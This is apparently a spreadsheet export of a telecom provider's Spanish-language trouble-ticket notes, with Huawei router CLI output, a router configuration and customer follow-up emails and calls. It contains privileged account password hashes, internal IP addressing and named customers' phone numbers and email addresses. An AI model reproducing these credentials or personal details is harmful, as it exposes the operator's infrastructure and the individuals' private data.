MAY 28 2022 17:20:12+00:00 FUNDENUSEWASLALA %%01IFPDT/4/IF_STATE(L)[7]:INTERFACE WLAN-RADIO0/0/1 HAS TURNED INTO UP STATE.
MAY 28 2022 17:20:12+00:00 FUNDENUSEWASLALA %%01IFPDT/4/IF_STATE(L)[8]:INTERFACE WLAN-RADIO0/0/0 HAS TURNED INTO UP STATE.
MAY 28 2022 17:19:40+00:00 FUNDENUSEWASLALA %%01IFNET/4/LINK_STATE(L)[9]:THE LINE PROTOCOL IP ON THE INTERFACE VLANIF1 HAS ENTERED THE UP STATE.
MAY 28 2022 17:19:40+00:00 FUNDENUSEWASLALA %%01IFNET/4/IF_STATE(L)[10]:INTERFACE VLANIF1 HAS TURNED INTO UP STATE.
MAY 28 2022 17:19:40+00:00 FUNDENUSEWASLALA %%01RM/4/ROUTERID_CHANGE(L)[11]:THE ROUTER ID IS 172.16.21.253. (INSTANCEID=0)
MAY 28 2022 17:19:39+00:00 FUNDENUSEWASLALA %%01IFPDT/4/IF_STATE(L)[12]:INTERFACE WLAN-BSS7 HAS TURNED INTO UP STATE.
MAY 28 2022 17:19:00+00:00 FUNDENUSEWASLALA %%01GTL/4/STATECHANGED(L)[13]:LICENSE STATE CHANGED FROM NULL TO DEFAULT.
&lt;FUNDENUSEWASLALA&gt;
DISPLAY CLOCK
2022-05-29 00:32:27
SUNDAY
TIME ZONE(DEFAULT ZONE NAME) : UTC+00:00
&lt;FUNDENUSEWASLALA&gt;
TABLA ARP DEL ROUTER CPE:
DISPLAY ARP
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                    VLAN/CEVLAN(SIP/DIP)      PVC
------------------------------------------------------------------------------
10.40.52.226    1856-4478-8532            I -         GE0/0/4
10.40.52.225    F41D-6BA3-8E28  17        D-0         GE0/0/4
172.16.21.253   1856-4478-8531            I -         VLANIF1
172.16.21.1     001E-F7D7-D69B  9         D-0         GE0/0/0
                                             1/-
172.16.21.242   1868-CBAD-ED55  10        D-0         GE0/0/0
                                             1/-
172.16.21.100   50C7-BF84-773A  14        D-0         GE0/0/0
                                             1/-
------------------------------------------------------------------------------
TOTAL:6         DYNAMIC:4       STATIC:0     INTERFACE:2
&lt;FUNDENUSEWASLALA&gt;
INTERFACES DEL ROUTER:
DISPLAY INT DESC
PHY: PHYSICAL
*DOWN: ADMINISTRATIVELY DOWN
(L): LOOPBACK
(S): SPOOFING
(B): BFD DOWN
^DOWN: STANDBY
(E): ETHOAM DOWN
(V): VIRTUALPORT
INTERFACE                     PHY     PROTOCOL DESCRIPTION
GE0/0/0                       UP      UP       HUAWEI, AR SERIES, GIGABITETHERNE
                                               T0/0/0 INTERFACE
GE0/0/1                       DOWN    DOWN     HUAWEI, AR SERIES, GIGABITETHERNE
                                               T0/0/1 INTERFACE
GE0/0/2                       DOWN    DOWN     HUAWEI, AR SERIES, GIGABITETHERNE
                                               T0/0/2 INTERFACE
GE0/0/3                       DOWN    DOWN     HUAWEI, AR SERIES, GIGABITETHERNE
                                               T0/0/3 INTERFACE
GE0/0/4                       UP      UP       HUAWEI, AR SERIES, GIGABITETHERNE
                                               T0/0/4 INTERFACE
GE0/0/5(V)                    UP      DOWN     VIRTUALPORT
NULL0                         UP      UP(S)    HUAWEI, AR SERIES, NULL0 INTERFAC
                                               E
VLANIF1                       UP      UP       LAN_CLIENTE
WLAN-BSS7                     UP      UP       HUAWEI, AR SERIES, WLAN-BSS7 INTE
                                               RFACE
WLAN0/0/0                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/
                                               0 INTERFACE
WLAN0/0/1                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/
                                               1 INTERFACE
&lt;FUNDENUSEWASLALA&gt;
DISPLAY  IP INT BRIEF
*DOWN: ADMINISTRATIVELY DOWN
^DOWN: STANDBY
(L): LOOPBACK
(S): SPOOFING
(E): E-TRUNK DOWN
THE NUMBER OF INTERFACE THAT IS UP IN PHYSICAL IS 4
THE NUMBER OF INTERFACE THAT IS DOWN IN PHYSICAL IS 0
THE NUMBER OF INTERFACE THAT IS UP IN PROTOCOL IS 3
THE NUMBER OF INTERFACE THAT IS DOWN IN PROTOCOL IS 1
INTERFACE                         IP ADDRESS/MASK      PHYSICAL   PROTOCOL
GIGABITETHERNET0/0/4              10.40.52.226/30      UP         UP
GIGABITETHERNET0/0/5              UNASSIGNED           UP         DOWN
NULL0                             UNASSIGNED           UP         UP(S)
VLANIF1                           172.16.21.253/24     UP         UP
&lt;FUNDENUSEWASLALA&gt;
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN MPLS_FUNDENUSE 10.40.52.226
  PING 10.40.52.226: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.40.52.226 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/2/6 MS
RUTA IP:
PE: 10.179.34.50
DISPLAY IP ROUTING-TABLE VPN-INSTANCE MPLS_FUNDENUSE 10.40.52.226
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : MPLS_FUNDENUSE
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.40.52.226/32  DIRECT  0    0                 0.0.0.0         VLANIF2229			</t>
  </si>
  <si>
    <t>F4580891</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A JOSÉ CHUC/CLIENTE CENTRAL; SE LE INFORMA QUE SE DARÁ SEGUIMIENTO A LAS 20:10 HORAS A SOLICITUD DE PR.</t>
  </si>
  <si>
    <t>F4580902</t>
  </si>
  <si>
    <t xml:space="preserve">SE RETOMA SE VALIDA QUE EL SERVICIO SE ENCUENTRA OPERATIVO PÓR PARTE DE CLARO SE PROCEDE CON CIERRE POR PROBLEMAS LAN CLIENTE.
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
SE OBSERVA ROUTER ACTIVO HACE: 7 HORAS Y 12 MINUTOS.
HUAWEI VERSATILE ROUTING PLATFORM SOFTWARE
VRP (R) SOFTWARE, VERSION 5.170 (AR610 V300R019C10SPC200)
COPYRIGHT (C) 2011-2020 HUAWEI TECH CO., LTD
HUAWEI AR611W ROUTER UPTIME IS 0 WEEK, 0 DAY, 7 HOURS, 13 MINUTES
MPU 0(MASTER) : UPTIME IS 0 WEEK, 0 DAY, 7 HOURS, 12 MINUTES
SDRAM MEMORY SIZE    : 1024    M BYTES
FLASH 0 MEMORY SIZE  : 1024    M BYTES
MPU VERSION INFORMATION :
1. PCB      VERSION  : AR-SRU617 VER.B
2. MAB      VERSION  : 0
3. BOARD    TYPE     : AR611W
4. BOOTROM  VERSION  : 1
&lt;FUNDENUSEWASLALA&gt;
CONFIGURACION DEL CPE:
DISPLAY  CURRENT-CONFIGURATION
[V300R019C10SPC200]
#
 SYSNAME FUNDENUSEWASLALA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
SSL POLICY DEFAULT_POLICY TYPE SERVER
 PKI-REALM DEFAULT
 VERSION TLS1.2
 CIPHERSUITE RSA_AES_128_CBC_SHA RSA_AES_128_SHA256 RSA_AES_256_SHA256 ECDHE_RSA_AES128_GCM_SHA256 ECDHE_RSA_AES256_GCM_SHA384
#
ACL NUMBER 2000
 RULE 5 PERMIT SOURCE 172.16.21.0 0.0.0.255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UNDO PASSWORD ALERT ORIGINAL
 DOMAIN DEFAULT
  AUTHENTICATION-SCHEME DEFAULT
  ACCOUNTING-SCHEME DEFAULT
 DOMAIN DEFAULT_ADMIN
  AUTHENTICATION-SCHEME DEFAULT
  ACCOUNTING-SCHEME DEFAULT
 LOCAL-USER ADMIN PASSWORD IRREVERSIBLE-CIPHER $1A$U3_"5ZW1;T$*Z*HF0DMBG0MZ@'~|VKFOSPYY!66]7/5B=-E`;TN$
 LOCAL-USER ADMIN PRIVILEGE LEVEL 15
 LOCAL-USER ADMIN SERVICE-TYPE TELNET TERMINAL SSH FTP X25-PAD HTTP
 LOCAL-USER SOPORTEDX PASSWORD IRREVERSIBLE-CIPHER $1A$AB2MS&lt;-O$,$)*BF&lt;B@KWEQFU&gt;:^%J$&gt;'OMEVJOHLB6LHBT*MXI,$
 LOCAL-USER SOPORTEDX PRIVILEGE LEVEL 15
 LOCAL-USER SOPORTEDX SERVICE-TYPE TELNET TERMINAL SSH FTP X25-PAD HTTP
#
WEB
 SET FAST-CONFIGURATION STATE DISABLE
 USER-SET DEFAULT
 USER-SET VIP
#
FIREWALL ZONE LOCAL
#
INTERFACE VLANIF1
 DESCRIPTION LAN_CLIENTE
 IP ADDRESS 172.16.21.253 255.255.255.0
#
INTERFACE GIGABITETHERNET0/0/0
#
INTERFACE GIGABITETHERNET0/0/1
#
INTERFACE GIGABITETHERNET0/0/2
#
INTERFACE GIGABITETHERNET0/0/3
#
INTERFACE GIGABITETHERNET0/0/4
 TCP ADJUST-MSS 1200
 IP ADDRESS 10.40.52.226 255.255.255.252
 QOS CAR INBOUND CIR 7168 CBS 1344000 PBS 2688000 GREEN PASS YELLOW PASS RED DISCARD
 QOS CAR OUTBOUND CIR 7168 CBS 1344000 PBS 2688000 GREEN PASS YELLOW PASS RED DISCARD
#
INTERFACE GIGABITETHERNET0/0/5
 DESCRIPTION VIRTUALPORT
#
INTERFACE WLAN-BSS7
 PORT HYBRID TAGGED VLAN 1
#
INTERFACE NULL0
#
 SNMP-AGENT LOCAL-ENGINEID 800007DB03185644788531
 SNMP-AGENT TRAP ENABLE
#
 TELNET SERVER ENABLE
#
 HTTP SECURE-SERVER SSL-POLICY DEFAULT_POLICY
 HTTP SECURE-SERVER ENABLE
 HTTP SERVER PERMIT INTERFACE GIGABITETHERNET0/0/0 WLAN-RADIO0/0/0
#
IP ROUTE-STATIC 0.0.0.0 0.0.0.0 10.40.52.225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OPS
#
AUTOSTART
#
SECELOG
#
 MS-CHANNEL
#
RETURN
&lt;FUNDENUSEWASLALA&gt;
LOG DEL ROUTER CPE:
DISPLAY LOGBUFFER
LOGGING BUFFER CONFIGURATION AND CONTENTS: ENABLED
ALLOWED MAX BUFFER SIZE: 1024
ACTUAL BUFFER SIZE: 512
CHANNEL NUMBER: 4, CHANNEL NAME: LOGBUFFER
DROPPED MESSAGES: 0
OVERWRITTEN MESSAGES: 0
CURRENT MESSAGES: 14
MAY 28 2022 17:20:18+00:00 FUNDENUSEWASLALA %%01MSTP/4/SET_PORT_FORWARDING(L)[0]:IN MSTP PROCESS 0 INSTANCE 0, MSTP SET PORT GIGABITETHERNET0/0/0 STATE AS FORWARDING.
MAY 28 2022 17:20:16+00:00 FUNDENUSEWASLALA %%01IFPDT/4/IF_STATE(L)[1]:INTERFACE GIGABITETHERNET0/0/0 HAS TURNED INTO UP STATE.
MAY 28 2022 17:20:15+00:00 FUNDENUSEWASLALA %%01DEV/4/ENTUP(L)[2]:AR611W BOARD[0] REGISTER SUCCESS.
MAY 28 2022 17:20:15+00:00 FUNDENUSEWASLALA %%01RM/4/IPV4_DEFT_RT_CHG(L)[3]:IPV4 DEFAULT ROUTE IS CHANGED. (CHANGETYPE=ADD, INSTANCEID=0, PROTOCOL=STATIC, EXITIF=GIGABITETHERNET0/0/4, NEXTHOP=10.40.52.225, NEIGHBOUR=0.0.0.0, PREFERENCE=60, LABEL=NULL, METRIC=0)
MAY 28 2022 17:20:14+00:00 FUNDENUSEWASLALA %%01IFNET/4/LINK_STATE(L)[4]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/4 HAS ENTERED THE UP STATE.
MAY 28 2022 17:20:14+00:00 FUNDENUSEWASLALA %%01IFPDT/4/IF_STATE(L)[5]:INTERFACE GIGABITETHERNET0/0/4 HAS TURNED INTO UP STATE.
MAY 28 2022 17:20:14+00:00 FUNDENUSEWASLALA %%01IFPDT/4/IF_STATE(L)[6]:INTERFACE GIGABITETHERNET0/0/5 HAS TURNED INTO UP STATE.
MAY 28 2022 17:20:12+00:00 FUNDENUSEWASLALA %%01IFPDT/4/IF_STATE(L)[7]:INTERFACE WLAN-RADIO0/0/1 HAS TURNED INTO UP STATE.
MAY 28 2022 17:20:12+00:00 FUNDENUSEWASLALA %%01IFPDT/4/IF_STATE(L)[8]:INTERFACE WLAN-RADIO0/0/0 HAS TURNED INTO UP STATE.
MAY 28 2022 17:19:40+00:00 FUNDENUSEWASLALA %%01IFNET/4/LINK_STATE(L)[9]:THE LINE PROTOCOL IP ON THE INTERFACE VLANIF1 HAS ENTERED THE UP STATE.
MAY 28 2022 17:19:40+00:00 FUNDENUSEWASLALA %%01IFNET/4/IF_STATE(L)[10]:INTERFACE VLANIF1 HAS TURNED INTO UP STATE.
MAY 28 2022 17:19:40+00:00 FUNDENUSEWASLALA %%01RM/4/ROUTERID_CHANGE(L)[11]:THE ROUTER ID IS 172.16.21.253. (INSTANCEID=0)
MAY 28 2022 17:19:39+00:00 FUNDENUSEWASLALA %%01IFPDT/4/IF_STATE(L)[12]:INTERFACE WLAN-BSS7 HAS TURNED INTO UP STATE.
MAY 28 2022 17:19:00+00:00 FUNDENUSEWASLALA %%01GTL/4/STATECHANGED(L)[13]:LICENSE STATE CHANGED FROM NULL TO DEFAULT.
&lt;FUNDENUSEWASLALA&gt;
DISPLAY CLOCK
2022-05-29 00:32:27
SUNDAY
TIME ZONE(DEFAULT ZONE NAME) : UTC+00:00
&lt;FUNDENUSEWASLALA&gt;
TABLA ARP DEL ROUTER CPE:
DISPLAY ARP
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                    VLAN/CEVLAN(SIP/DIP)      PVC
------------------------------------------------------------------------------
10.40.52.226    1856-4478-8532            I -         GE0/0/4
10.40.52.225    F41D-6BA3-8E28  17        D-0         GE0/0/4
172.16.21.253   1856-4478-8531            I -         VLANIF1
172.16.21.1     001E-F7D7-D69B  9         D-0         GE0/0/0
                                             1/-
172.16.21.242   1868-CBAD-ED55  10        D-0         GE0/0/0
                                             1/-
172.16.21.100   50C7-BF84-773A  14        D-0         GE0/0/0
                                             1/-
------------------------------------------------------------------------------
TOTAL:6         DYNAMIC:4       STATIC:0     INTERFACE:2
&lt;FUNDENUSEWASLALA&gt;
INTERFACES DEL ROUTER:
DISPLAY INT DESC
PHY: PHYSICAL
*DOWN: ADMINISTRATIVELY DOWN
(L): LOOPBACK
(S): SPOOFING
(B): BFD DOWN
^DOWN: STANDBY
(E): ETHOAM DOWN
(V): VIRTUALPORT
INTERFACE                     PHY     PROTOCOL DESCRIPTION
GE0/0/0                       UP      UP       HUAWEI, AR SERIES, GIGABITETHERNE
                                               T0/0/0 INTERFACE
GE0/0/1                       DOWN    DOWN     HUAWEI, AR SERIES, GIGABITETHERNE
                                               T0/0/1 INTERFACE
GE0/0/2                       DOWN    DOWN     HUAWEI, AR SERIES, GIGABITETHERNE
                                               T0/0/2 INTERFACE
GE0/0/3                       DOWN    DOWN     HUAWEI, AR SERIES, GIGABITETHERNE
                                               T0/0/3 INTERFACE
GE0/0/4                       UP      UP       HUAWEI, AR SERIES, GIGABITETHERNE
                                               T0/0/4 INTERFACE
GE0/0/5(V)                    UP      DOWN     VIRTUALPORT
NULL0                         UP      UP(S)    HUAWEI, AR SERIES, NULL0 INTERFAC
                                               E
VLANIF1                       UP      UP       LAN_CLIENTE
WLAN-BSS7                     UP      UP       HUAWEI, AR SERIES, WLAN-BSS7 INTE
                                               RFACE
WLAN0/0/0                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/
                                               0 INTERFACE
WLAN0/0/1                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/
                                               1 INTERFACE
&lt;FUNDENUSEWASLALA&gt;
DISPLAY  IP INT BRIEF
*DOWN: ADMINISTRATIVELY DOWN
^DOWN: STANDBY
(L): LOOPBACK
(S): SPOOFING
(E): E-TRUNK DOWN
THE NUMBER OF INTERFACE THAT IS UP IN PHYSICAL IS 4
THE NUMBER OF INTERFACE THAT IS DOWN IN PHYSICAL IS 0
THE NUMBER OF INTERFACE THAT IS UP IN PROTOCOL IS 3
THE NUMBER OF INTERFACE THAT IS DOWN IN PROTOCOL IS 1
INTERFACE                         IP ADDRESS/MASK      PHYSICAL   PROTOCOL
GIGABITETHERNET0/0/4              10.40.52.226/30      UP         UP
GIGABITETHERNET0/0/5              UNASSIGNED           UP         DOWN
NULL0                             UNASSIGNED           UP         UP(S)
VLANIF1                           172.16.21.253/24     UP         UP
&lt;FUNDENUSEWASLALA&gt;
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN MPLS_FUNDENUSE 10.40.52.226
  PING 10.40.52.226: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.40.52.226 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/2/6 MS
RUTA IP:
PE: 10.179.34.50
DISPLAY IP ROUTING-TABLE VPN-INSTANCE MPLS_FUNDENUSE 10.40.52.226
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : MPLS_FUNDENUSE
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.40.52.226/32  DIRECT  0    0                 0.0.0.0         VLANIF2229			</t>
  </si>
  <si>
    <t>F4580939</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 27 DE MAYO DE 2022 20:20
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; CENTRO DE ATENCION DE ENLACES &lt;CAE@AZTECASERVICIOS.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; ALVAREZ TOMAS, KENDY FABIOLA &lt;KENDY.ALVAREZ@CLARO.COM.HN&gt;
CC: MARCO ANTONIO HERNANDEZ RUEDA &lt;MAHERNANDEZ@BANCOAZTECA.COM.HN&gt;; FRANCISCO CANO NEPAUSENO &lt;FCANO@ELEKTRA.COM.MX&gt;
ASUNTO: RE: SUCURSAL 5236 - MEGAMALL || ID ENLACE: 1729792 || ENLACE SIN SERVICIO
BUENA TARDES ESTIMADOS(A)
POR FAVOR SU AMABLE APOYO VALIDANDO SI AÚN PERCIBEN EL INCONVENIENTE SERVICIO SE ENCUENTRA ACTIVO ALCANZABLE A NIVEL DE PING DE FORMA ESTABLE. GRACIAS DE ANTEMANO.
&lt;CSPSHNPPN1D1EIM3&gt;PING -Q -C 1000 -S 1400 -M 50 -VPN BANCO_AZTECA 10.2.137.146
  PING 10.2.137.146: 1400  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.2.137.146 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/22 MS</t>
  </si>
  <si>
    <t>F4580946</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BRAYAN RAMOS AL 41549528 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO**
ID 2001962131
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BRAYAN RAMOS 41549528 CONFIRMA SERVICIO ESTABLE Y OPERATIVO
ID 2001981927
**</t>
  </si>
  <si>
    <t>F4580955</t>
  </si>
  <si>
    <t>SE CONTACTA A CLIENTE ERICK 46362626 QUIEN REALIZA LLAMADAS ENTRANTES Y SALIENTES Y VALIDA QUE EL E1 YA SE ENCUENTRA FUNCIONANDO. AUTORIZA EL CIERRE DEL CASO.
2001745097
COLA:
NOMBRE: A: 46362626
NÚMERO: 46362626
DURACIÓN: 0:03:03
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 46362626
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 28/05/2022 09:43:57 A. M.</t>
  </si>
  <si>
    <t>F4581096</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAYNOR LARIOS  66209720 EXT 113021 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001107254</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 30 DE MAYO DE 2022 10:34
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; MAYNOR LARIOS &lt;MAYNORLARIOS@ICASA.COM.GT&gt;
CC: TELECOMUNICACIONES VPC &lt;TELECOMVPC@ICASA.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE PLAYA GRANDE ID: 405900004. INESTABLE
BUEN DÍA
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO SD1129912, A NIVEL DE CLARO SE VALIDÓ INCONVENIENTES EN LA PROST DEL WIMAX Y SE REALIZÓ CAMBIO DE FRECUENCIA, LUEGO DE REALIZAR ESE CAMBIO SE HA MANTENIDO EN OBSERVACIÓN Y NO HA PRESENTADO INCONVENIENTES.
SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN HUEX ALONSO  49303823 - 54407183 ENVIAN DIRECTO A BUZON, SE INTENTARA LUEGO
-ID 3001012988 - 3001013106</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 54407183 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001108263</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN HUEX ALONSO  49303823 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001107988</t>
  </si>
  <si>
    <t>F4581346</t>
  </si>
  <si>
    <t>--- MASIVA F4581446 CERRADA (29/05/2022 09:44:47). ...
...</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A CLIENTE VÍA CORREO, SE LE INFORMA AVANCES DE LA FALLA QUE SE DESCRIBE EN CRONO ANTERIOR, AVANCES HASTA EL DÍA DE MAÑANA.
ASUNTO: RE: ENLACE CAÍDO DE DF AZACUALPA ID: 753234</t>
  </si>
  <si>
    <t>***--- SE RESPONDE CORREO A CL INDICANDO AVANCES --***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: DOMINGO, 29 DE MAYO DE 2022 04:38
PARA: MALAQUIAS PANJOJ (VENDOR) &lt;MALAQUIAS.PANJOJ@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO DE DF AZACUALPA ID: 753234
ESTIMADO SR. MALAQUIAS.
                LAMENTAMOS LOS INCONVENIENTES, ACTUALMENTE NUESTRO PERSONAL TÉCNICO DE CAMPO CONTINUA TRABAJANDO EN LA FALA GENERAL REPARANDO EL DAÑO.
DE MOMENTO NO CONTAMOS CON UN ETA SIN EMBARGO ESPERAMOS INDICAR AVANCES A LAS 08:00 HORAS, ADICIONAL CONTINUAREMOS SOLICITANDO APOYO PARA OBTENER EL ETA Y ESPERAMOS SEA RESUELTO LO ANTES POSIBLE.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: MALAQUIAS PANJOJ (VENDOR) [MAILTO:MALAQUIAS.PANJOJ@WALMART.COM]
ENVIADO EL: DOMINGO, 29 DE MAYO DE 2022 04:28
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE DF AZACUALPA ID: 753234
BUENOS DÍAS;
NOS COMPARTEN LOS AVANCES O ALGÚN ETA PARA EL RESTABLECIMIENTO DEL SERVICIO.
SALUDOS!</t>
  </si>
  <si>
    <t>SEGUIMIENTO FALLA GENERAL F4581299/FALLA MASIVA F4581446:
28/05/2022 19:01:14 GUATEMALA/CENTRO AMERICA (MIGUEL ANGEL DURAN CHICAS):
SE LLAMA A OLMAN ALVARADO 0050431704072 INDICA QUE YA SE REPARO FO, SIN EMBARGO FALLA TIENE QUE SER ESCALADA A DATOS YA QUE DEL LADO DE AZACUALPA NO SE TIENE SEÑAL MARCANDO DISTANCIA 4.1 KM LA CUAL ES LA DISTANCIA QUE MARCA AL SITIO, ESTE SITIO ESTA EN UNA PROPIEDAD PRIVADA LA CUAL DARA ACCESO HASTA LAS 5:30 AM DEL DIA DE MAÑANA.</t>
  </si>
  <si>
    <t>--- SE ESCALA CON KEVYN FONSECA, INDICA QUE INFORMARA AL PERSONAL. ...
RESULTADO: LLAMADA HECHA
NOMBRE: 41284612
NÚMERO: 41284612
INICIO: HOY, 10:16
FIN: HOY, 10:18
DURACIÓN: 1:11
ID DE LLAMADA: 2001887336
...</t>
  </si>
  <si>
    <t>F4581371</t>
  </si>
  <si>
    <t>SE RECIBE Y SE RESPONDE CORREO AL CLIENTE, A LA ESPERA DE ATURIZACION DE PERSONAL TECNICO
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: SÁBADO, 28 DE MAYO DE 2022 8:53
PARA: CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;
ASUNTO: RE: AYUDA CAÍDA DE ENLACE CLARO
BUEN DÍA
ESTIMADO CLIENTE DANDO SEGUIMIENTO AL INCIDENTE REPORTADO, QUEDAMOS ATENTOS PARA LA AUTORIZACIÓN DE PERSONAL TÉCNICO.
SALUDOS CORDIALES.
DE: CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;
ENVIADO: SÁBADO, 28 DE MAYO DE 2022 7:51
PARA: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ASUNTO: RE: AYUDA CAÍDA DE ENLACE CLARO
¿ESTIMADO CLIENTE, GRACIAS POR CONTACTARNOS, HEMOS RECIBIDO TU CORREO Y EN BREVE UNO DE NUESTROS EJECUTIVOS ESTARÁ DÁNDOLE TRÁMITE A TU SOLICITUD".</t>
  </si>
  <si>
    <t>F4581392</t>
  </si>
  <si>
    <t>SE CAMBIA LA BSR DEL LADO DE CENTRAL QUE PRESETABA PERDIDAS WILIAM AVILA ATIENDE EN SELECOM,,  JORGE MARTINEZ TECNICO VALIDA OPERATIVIDAD DE SERVICIO</t>
  </si>
  <si>
    <t>SEGUIMIENTO CON PERSONAL TÉCNICO ASIGNADO, ADICIONAL SE LLAMÓ A CLIENTE 77401515 PARA BRINDARLE AVANCES DEL TICKET, NO CONTESTA.</t>
  </si>
  <si>
    <t>F4581402</t>
  </si>
  <si>
    <t>CLIENTE SR. JOSE BOLAÑOS 59852965 CONTINUA SIN CONTESTAR...</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. JOSE BOLAÑOS 77561170 NO SE LOGRA COMUNICACION ...</t>
  </si>
  <si>
    <t>ESTIMADOS SOC FAVOR SU APOYO VALIDANDE ESTE ENLACE, INFORMAR SI ES NECESARIO ENVIAR PERSONAL TECNICO, CLIENTE SR. ERICK CIPICEN 58861282 INFORMA QUE DEL CTC SE CONECTA DIRECTAO AL CISCO MERAKI MX64 Y A OTRO ROUTER LTE, SEGUN CAMBIO 5227954 AHORA ES ENLACE SDWAN.
SE OBSERVA EN EL PE QUE SUBE LA MAC DEL MERAKI, VALIDAR SI ESTA CONECTADO EL EL PUERTO CORRECTO:
&lt;ZRHOGTRHN1D1C01A23EIM3&gt;DISP ARP ALL | IN 10.87.199.164
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                          VLAN/CEVLAN PVC
----------------------------------------------------------------------------------------
10.87.199.164   9818-886C-0E2D  2         D-0         VLANIF2575       DATOSGUADALUPE
----------------------------------------------------------------------------------------
TOTAL:1270         DYNAMIC:1087       STATIC:0    INTERFACE:183    REMOTE:0
